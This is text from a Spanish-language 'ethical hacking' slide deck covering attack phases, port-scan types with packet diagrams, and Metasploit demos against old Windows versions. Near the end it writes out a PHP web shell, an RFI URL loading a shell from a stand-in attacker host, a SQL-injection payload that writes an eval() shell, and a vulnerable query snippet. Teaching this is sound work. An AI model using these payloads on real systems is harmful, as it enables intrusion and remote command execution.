Técnicas avanzadas de penetración a
sistemas
HACKING ETICO
Los hackers éticos son profesionales de la seguridad que
aplican sus conocimientos de hacking con fines
defensivos (y legales). Diremos hacker siempre, pero hay
que fijarse en el contexto.
QUE ES UN HACKER
 Experto en algún campo de la informática
 Conocimientos profundos de diversas
Plataformas (Windows, Unix, Linux, android).
 Conocimientos de redes
 Conocimientos de hardware y software.
Pasos previos al
ATAQUE
1. Reconocimiento
• Pasivo
• Activo
2. Rastreo (escaner)
3. Acceso
•
•
•
Niveles del Sistema
Redes
DOS
4. Mantener el
acceso
5. Borrado de
huellas
FOOTPRINTING
Obtención de los perfiles de seguridad de una organización
haciendo uso de una metodología (footprinting).
El resultado del footprinting es un perfil único de la
organización en cuanto a sus redes (Internet / Intranet /
Extranet /Wireless) y sistemas.
FOOTPRINTING
1.- Obtener información inicial
• whois
• nslookup
2.- Localizar el rango de red
• Traceroute
TIPOS DE ATAQUES
1.- Hacking WIFI
2.-DOS
3.-DDOS
4.-M.I.T
5.- Envenenamiento DNS
6.-Reverse Shell
7.-Port scaning
8.-Inyecciones SQL
9.-R.F.I
10.-XSS
11.-Inyeccion de
comandos arbitrarios
12.-Hijacking
13.-Cookie poisoning
Escaneo de Puertos
El escaneo de puertos es el ataque primario y mas común
utilizado en una auditoria ya sea legal o ilegal.
Nos permite :
Explorar
Identificar
Comprender
Técnicas
Tipo de
escaneo
Abierto
Medio
abierto
Silencioso
Barridos
Otros
TCP connect ()
TCP SYN
TCP FIN
TCP echo
UDP scan
Reverse Ident
Zombie scan
ACK Scan
UDP echo
Null Scan
TCP ACK
FTP
bounce
scan
Xmas Scan
TCP SYN
SYN/ACK Scan
Fragmentación TCP
ICMP echo
TCP connect()
La mas común de cualquier software de escaneo de puertos
consiste en usar la llamada connect() de TCP
Intenta establecer conexión
Si conecta el puerto esta abierto
si no , el puerto esta cerrado
Si no contesta esta silencioso
Muy rápido e invasivo y llamativo en exceso.
* Miles de conexiones
*Logs
Comportamiento
TCP connect()
Hacker-------[SYN]------>[0] Puerto TCP Victima OPEN
Hacker<-------[SYN/ACK]-------[0] Puerto TCP Victima OPEN
Hacker-------[ACK]------->[0] Puerto TCP Victima OPEN
Hacker-------[SYN]------->[X] Puerto TCP Victima CLOSED
Hacker<-----[RST]-------[X] Puerto TCP Victima CLOSED
Hacker------[SYN]-------[*] Puerto TCP Victima SILENT
TCP SYN
Técnica conocida como Half-open scan, escaneo medio abierto por
excelencia
se envía un paquete SYN fingiendo establecer una conexion y se
espera la respuesta del Host, si llega un paquete SYN/ACK
significa que esta abierto y no devolvemos la contestación ACK,
devolvemos RST , esto para evitar que se complete el inicio
de conexión y así burlar el registro del sistema como intento de
conexión
*Discreto
*Excelentes resultados
Comportamiento
TCP SYN
Hacker ---[SYN]---> [O] P. TCP abierto en la Victima
Hacker <---[SYN/ACK]--- [O] P. TCP abierto en la Victima
Hacker ---[RST]---> [O] P. TCP abierto en la Victima
Hacker ---[SYN]---> [X] Puerto TCP cerrado en la Victima
Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima
Hacker ---[SYN]---> [~] Puerto TCP silencioso en la Victima
ACK scan
Destinado a identificar aquellos puertos que están en estado
silencioso de forma precisa cuando un puerto esta en este estado o
no.
Envía paquetes ACK con números de secuencia y confirmación
aleatorios.
si el puerto esta abierto, responderá con un paquete RST, pues no
identificara la conexión como suya
si el puerto esta cerrado responderá RST pero si no responde es que
esta filtrado.
* Apoyo de un escaneo anterior
*Variable del ping si responde RST
esta vivo si no es in alcanzable.
*Identificar firewall bloqueando SYN.
Comportamiento
ACK scan
Hacker ---[ACK]---> [O] Puerto TCP abierto en la Victima
Hacker <---[RST]--- [O] Puerto TCP abierto en la Victima
Hacker ---[ACK]---> [X] Puerto TCP cerrado en la Victima
Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima
Hacker ---[ACK]---> [~] Puerto TCP silencioso en la Victima
Null scan
Similar al FIN, funciona del mismo modo, enviando
paquetes malformados, pero en este caso con
los flags desactivados, si el puerto esta cerrado nos
responderá con RST y En caso de no recibir nada el puerto
esta abierto o silencioso.
Ciertos firewalls vigilan los paquetes de finalización aquí
hace lo que FIN no.
Comportamiento
Null scan
Hacker ---[ ]---> [O] Puerto TCP abierto en la Victima
local ---[ ]---> [X] Puerto TCP cerrado en la Victima
Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima
Hacker ---[ ]---> [~] Puerto TCP silencioso en la Victima
La razón
POC
Ataques MIT
1. DNS cache poisoning
2. ARP Poisoning
3. Phishing
EXPLOTACION
Escáner de
vulnerabilidades
Escáner de
vulnerabilidades
EXPLOTACION
Metasploit
Windows Server 2003
Puerto 445
1.
2.
3.
4.
Penetración
Windows Server 2003
prueba de concepto
ms08067
Crear usuario
Habilitar Escritorio Remoto
Cambiar la contraseña del Administrador
OBJETIVO
Mostrar el ataque de penetración a
Windows server 2003 en un ambiente
controlado.
Metasploit
Windows Server 2008 R2
Metasploit
Windows Server 2008 R2
•Numero de vulnerabilidad : ms09050
•Encontrar el servidor verificando versión de smb
•Explotar la vulnerabilidad
•Denegación de servicios.
OBJETIVO
Mostrar el ataque de Denegación de
servicios a Windows server 2008 en un
ambiente controlado.
Metasploit
Windows XP SP3
Metasploit
Penetración a Windows XP SP3
Prueba de concepto
1. Encontrar la victima verificando versión de SMB
2. Lograr la obtención de una reverse shell
3. Habilitar el uso de escritorio remoto
4. Inyectar la conexión a escritorio remoto
OBJETIVO
Mostrar el ataque de penetración a
windows XP sp3 en un ambiente controlado.
Metasploit
Windows 7
Metasploit
Windows 7 Penetración
Prueba de concepto
1. Usar INGENIERIA SOCIAL
2. Copiar netcat a la victima y crear puerta trasera
creando REVERSE SHELL
3. Vulnerar navegador web.
4. UPLOAD MI PATH C:\DESTINO\\Downloads
OBJETIVO
Mostrar el ataque de penetración a
windows 7 en un ambiente controlado.
Ataques WEB
Ataques XSS
Analicemos la vulnerabilidad de xss
Es una vulnerabilidad de grado medio alto ya que con estos
ataques será posible el re alizar el hijacking que es el robo de
identidad mediante las cookies del navegador
Ataques XSS
Ataques XSS
Ataques XSS
Ataques RFI
Remote file inclusion
vulnerabilidad que afecta únicamente a paginas dinámicas
programadas en PHP, consiste en enlazar archivos ubicados en un
servidor remoto.
RFI se aprovecha del uso irresponsable de las
funciones include y requiere, las cuales, debido al limitado
conocimiento del programador y
las pocas o nulas validaciones que realiza antes de incluir una variable
recibida por
parametro de URL, pueden ser aprovechadas por usuarios maliciosos
para incluir scripts
programados para explotar dicha vulnerabilidad.
Ataques RFI
Remote file inclusion
http://www.victima.com/index.php?nav=pagina1php
http://www.victimacom/index.php?nav=pagina2.php
<?php
print system($_GET['command']);
?>
http://www.victima.com/index.php?nav=http://atacante.com/shel
l.txt&command=ls
Inyeccion SQL
union all select "<?php
eval($_GET['exec']); ?>",2,3,4into
outfile"/var/www/html/exec.php"
Analicemos este código
<?php
$link = mysql_connect('127.0.0.1','root', 'pass');
mysql_select_db('ejemplo', $link);
$sql = mysql_query('select * from ejemplo where id='.$_GET['id'], $link);
if(mysql_errno($link))
{ echo mysql_error($link);
exit;
}
while($row = mysql_fetch_assoc($sql))
{ echo $
row['id']."
".$row['titulo']."
".$row['contenido']."
".$row['parent'];
}?
>
Busqueda de tablas.
Prueba de concepto
OBJETIVO
Mostrar el ataque de inyección SQL y la
técnica de intrusión de SHELL en un
ambiente controlado.
EL RESULTADO
llegando a una conclusión
El resultado.
GRACIAS
Descargar

Tecnicas avanzadas de penetracion a sistemas